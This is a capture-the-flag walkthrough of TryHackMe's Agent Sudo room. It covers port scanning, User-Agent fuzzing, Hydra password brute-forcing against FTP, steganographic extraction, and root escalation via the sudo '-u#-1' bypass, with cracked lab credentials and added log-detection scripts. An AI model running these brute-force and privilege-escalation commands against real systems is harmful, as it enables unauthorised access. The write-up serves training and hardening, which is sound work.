
Agent Sudo CTF

URL:

https://tryhackme.com/room/agentsudoctf


Description:

Agent Sudo CTF is a CTF challenge found on the Try Hack Me website. This is an easy-level room focused on modifying HTTP headers, password brute-forcing, steganography and sudo privileges.


Enumeration:

We start with a Rustscan[1] to quickly find any open ports, followed by an Nmap report of the service versions on the discovered ports.

sudo rustscan -a 10.10.236.116 -- -sV -sS -oN agentsudo_nmap.txt

The above scan is targeting the IP address 10.10.236.116 and passing the following parameters through to Nmap[2]:

Nmap Commands Overview:
-sV = Probes each open port to determine the version of the service running on it.
-sS = Type of scan (SYN scan) being used. Considered a slower and more quiet scan. However, since I am running this through Rustscan (which is a loud scanner) there is no real advantage to doing this; I am just used to it.
-oN = Saves the output to a text file I have named, so I can review the results later if necessary.

Results:

nmap -vvv -p 21,22,80 -sV -sS -oN agentsudo_nmap.txt 10.10.236.116
Nmap scan report for 10.10.236.116
Host is up, received echo-reply ttl 61 (0.29s latency).
Scanned at 2021-08-24 07:05:45 EDT for 10s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We have found the machine has an FTP server, a web server hosted via Apache, and SSH enabled. First things first, let's check whether 'anonymous' login is enabled on the FTP server.

ftp 10.10.236.116
Connected to 10.10.236.116.
220 (vsFTPd 3.0.3)
Name (10.10.236.116:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.

No luck. The FTP server does not allow anonymous login, so let's now look at the website.

[Image: agent_code]

The instructions on the webpage inform us of 2 things:

  1. We are 'Agent' someone.
  2. We are not 'Agent R'.

Now we need to figure out how to access this message on the system. The User-Agent[3] header is part of the HTTP request sent by a web browser, and it identifies to the web server who is accessing it (e.g. Google crawlers, Wget, Chrome, Firefox, etc.). The message above is telling us to modify the User-Agent within the HTTP header; we should then get access to the message we require. Let's do this with Burp Suite[4] and a wordlist of the alphabet:

[Image: user-agent_header]

We will send this intercepted request to Intruder and perform a sniper attack against the web server, fuzzing the User-Agent value for the compromised agent.

[Image: burpsuite_sniper]

[Image: Agent_C]

We can see from the results that 'R' returns a viewable webpage while 'C' returns a redirect. With this information, we can assume the message was directed at Agent C.
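As an added example (not part of the original walkthrough), here is a Python check a defender could run over Apache access logs to spot the User-Agent enumeration described above: many distinct, very short User-Agent strings from one client, plus which of them drew a redirect. The log lines are constructed samples, not captures from the room.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache "combined" log format (not from the room).
# 10.9.1.7 cycles single-letter User-Agents the way the Burp sniper attack does.
SAMPLE_LOG = """\
10.9.1.7 - - [24/Aug/2021:11:05:01 +0000] "GET / HTTP/1.1" 200 2541 "-" "A"
10.9.1.7 - - [24/Aug/2021:11:05:01 +0000] "GET / HTTP/1.1" 200 2541 "-" "B"
10.9.1.7 - - [24/Aug/2021:11:05:02 +0000] "GET / HTTP/1.1" 302 0 "-" "C"
10.9.1.7 - - [24/Aug/2021:11:05:02 +0000] "GET / HTTP/1.1" 200 2541 "-" "D"
10.9.1.7 - - [24/Aug/2021:11:05:03 +0000] "GET / HTTP/1.1" 200 2541 "-" "R"
10.9.2.3 - - [24/Aug/2021:11:06:10 +0000] "GET / HTTP/1.1" 200 2541 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/91.0"
"""

# One "combined" log line: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_combined(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_ua_enumeration(lines, min_distinct=4, max_ua_len=3):
    """Return {ip: {"uas": [...], "redirected_on": [...]}} for clients that sent
    at least min_distinct different User-Agents of max_ua_len characters or fewer.
    Real browsers never send such values, so this is a strong fuzzing signal."""
    short_uas = defaultdict(set)
    redirects = defaultdict(set)
    for line in lines:
        rec = parse_combined(line)
        if not rec:
            continue
        if len(rec["ua"]) <= max_ua_len:
            short_uas[rec["ip"]].add(rec["ua"])
            if rec["status"].startswith("3"):   # the server treated this UA specially
                redirects[rec["ip"]].add(rec["ua"])
    return {ip: {"uas": sorted(uas), "redirected_on": sorted(redirects[ip])}
            for ip, uas in short_uas.items() if len(uas) >= min_distinct}

if __name__ == "__main__":
    for ip, info in find_ua_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {len(info['uas'])} short User-Agents tried, "
              f"redirect served for {info['redirected_on']}")
```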

[Image: compromised]

We have a username of 'chris' and a hint that the password is weak. With this information we can move to brute-forcing the account with Hydra[5]. Considering the FTP server is still yet to be compromised, I will begin by brute-forcing this service with the username 'chris'.

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.236.116 -V

The above command is instructing Hydra to perform the following:

Hydra Commands Overview:
-l = I am hardcoding the username to be used with the brute-force. This is a fixed parameter.
-P = This tells Hydra to use a wordlist for the password. This is a form of fuzzing and allows the username 'chris' to be tried against a number of different passwords.
ftp://10.10.236.116 = I am specifying the target host and the protocol to run the brute-force against. As FTP is on its default port (21) we do not need to specify a port for this tool.
-V = Verbose output, so I can ensure the attack is running correctly during operation.

Result:

[21][ftp] host: 10.10.236.116 login: chris password: crystal

Username:Password

chris:crystal
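The defender's view of the Hydra run above, as an added example that is not part of the original walkthrough: a Python check over vsftpd.log that flags a (client, user) pair whose successful login follows a burst of failed attempts, which is exactly the trace a wordlist attack leaves behind. The log lines are constructed samples in vsftpd's log format, not captures from the room.

```python
import re
from collections import defaultdict

# Constructed vsftpd.log lines (not from the room): one client fails repeatedly
# for "chris" and then succeeds; a second client fails once, then succeeds.
SAMPLE_VSFTPD_LOG = """\
Tue Aug 24 13:01:01 2021 [pid 1201] CONNECT: Client "10.9.1.7"
Tue Aug 24 13:01:01 2021 [pid 1200] [chris] FAIL LOGIN: Client "10.9.1.7"
Tue Aug 24 13:01:02 2021 [pid 1204] [chris] FAIL LOGIN: Client "10.9.1.7"
Tue Aug 24 13:01:02 2021 [pid 1208] [chris] FAIL LOGIN: Client "10.9.1.7"
Tue Aug 24 13:01:03 2021 [pid 1212] [chris] FAIL LOGIN: Client "10.9.1.7"
Tue Aug 24 13:01:03 2021 [pid 1216] [chris] OK LOGIN: Client "10.9.1.7"
Tue Aug 24 13:05:40 2021 [pid 1300] [chris] FAIL LOGIN: Client "10.9.2.3"
Tue Aug 24 13:05:45 2021 [pid 1301] [chris] OK LOGIN: Client "10.9.2.3"
"""

# Matches only the login result lines; CONNECT and transfer lines are ignored.
LOGIN_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$'
)

def find_bruteforce_success(lines, min_failures=3):
    """Return [(ip, user, failures_before_success)] for every (client, user)
    pair where an OK LOGIN follows at least min_failures FAIL LOGIN lines."""
    failures = defaultdict(int)
    hits = []
    for line in lines:
        m = LOGIN_RE.match(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["result"] == "FAIL":
            failures[key] += 1
        elif failures[key] >= min_failures:
            hits.append((m["ip"], m["user"], failures[key]))
            failures[key] = 0
        else:
            failures[key] = 0      # an ordinary login resets the counter
    return hits

if __name__ == "__main__":
    for ip, user, n in find_bruteforce_success(SAMPLE_VSFTPD_LOG.splitlines()):
        print(f"{ip} logged in as {user} after {n} failed attempts")
```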

We now have access to the FTP server.

ftp 10.10.236.116
Connected to 10.10.236.116.
220 (vsFTPd 3.0.3)
Name (10.10.236.116:kali): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-rw-r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.

Let's download and view the files.

ftp> get To_agentJ.txt
local: To_agentJ.txt remote: To_agentJ.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
226 Transfer complete.
217 bytes received in 0.00 secs (1.8153 MB/s)
ftp> get cute-alien.jpg
local: cute-alien.jpg remote: cute-alien.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
226 Transfer complete.
33143 bytes received in 0.59 secs (55.3043 kB/s)
ftp> get cutie.png
local: cutie.png remote: cutie.png
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
226 Transfer complete.
34842 bytes received in 0.58 secs (58.6397 kB/s)

Viewing the contents of To_agentJ.txt:

cat To_agentJ.txt
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C

The data is hidden via steganography in one of the 2 images. As we are dealing with a JPG and a PNG file, the way data is embedded differs between the two formats, so different tools may be needed to recover it. We will start with cute-alien.jpg and use the tool Stegseek[6].

stegseek cute-alien.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "Area51"
[i] Original filename: "message.txt".
[i] Extracting to "cute-alien.jpg.out".

cat cute-alien.jpg.out
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

We now have a username and password to log into the SSH service.

Username:Password

james:hackerrules!

Resources:

[1] https://rustscan.github.io/RustScan/
[2] https://nmap.org/book/man.html
[3] https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent
[4] https://portswigger.net/burp
[5] https://www.thc.org/thc-hydra/
[6] https://github.com/RickdeJager/stegseek


Compromise:

With the username and password known, we can log into the server via SSH.

ssh james@10.10.236.116
james@10.10.236.116's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Aug 24 13:27:16 UTC 2021

System load: 0.0 Processes: 97
Usage of /: 40.1% of 9.78GB Users logged in: 0
Memory usage: 39% IP address for eth0: 10.10.236.116
Swap usage: 0%


75 packages can be updated.
33 updates are security updates.


Last login: Tue Oct 29 14:26:27 2019
james@agent-sudo:~$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

Success. Now we can grab the user flag.

james@agent-sudo:~$ ls -la
total 80
drwxr-xr-x 4 james james 4096 Oct 29 2019 .
drwxr-xr-x 3 root root 4096 Oct 29 2019 ..
-rw-r--r-- 1 james james 42189 Jun 19 2019 Alien_autospy.jpg
-rw------- 1 root root 566 Oct 29 2019 .bash_history
-rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
drwx------ 2 james james 4096 Oct 29 2019 .cache
drwx------ 3 james james 4096 Oct 29 2019 .gnupg
-rw-r--r-- 1 james james 807 Apr 4 2018 .profile
-rw-r--r-- 1 james james 0 Oct 29 2019 .sudo_as_admin_successful
-rw-r--r-- 1 james james 33 Oct 29 2019 user_flag.txt
james@agent-sudo:~$ cat user_flag.txt
REDACTED

Privilege escalation:

Now that we have compromised the user account we can focus on privilege escalation. As we know the user's password, we can check whether this account has any sudo privileges.

james@agent-sudo:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
james@agent-sudo:~$ sudo --version
Sudo version 1.8.21p2

sudo -l states that we can run /bin/bash[7] as any user except root. The problem is that the version of sudo on the machine is out of date and has a known bug[8]: a user id of '-1' passed with -u is converted to 0 within sudo. This drops the user straight into root, bypassing the !root restriction. To exploit this we run the following:

james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# id
uid=0(root) gid=1000(james) groups=1000(james)

Now we have root we can grab the root flag:

root@agent-sudo:~# cat /root/root.txt
To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.

Your flag is
REDACTED

By,
DesKel a.k.a Agent R

Resources:

[7] https://gtfobins.github.io/gtfobins/bash/
[8] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-less-than-v-1-28


Hardening:

To prevent this machine from being compromised in future, the following policies should be enforced:
  1. Require all users to use more complex/longer passwords. The longer a password is, the longer it takes a machine to brute-force it.
  2. Update sudo to patch the known bug, which restores the restriction on the user's access to the device and enforces the policy set in sudoers.


Conclusion:

Through this challenge we have learnt a little about steganography within JPG files, the reason why strong passwords are a necessity, and the need to always keep the services and binaries on our systems up to date. I hope you have enjoyed this guide and maybe learnt something new. Thank you for reading through my walkthrough of Agent Sudo CTF.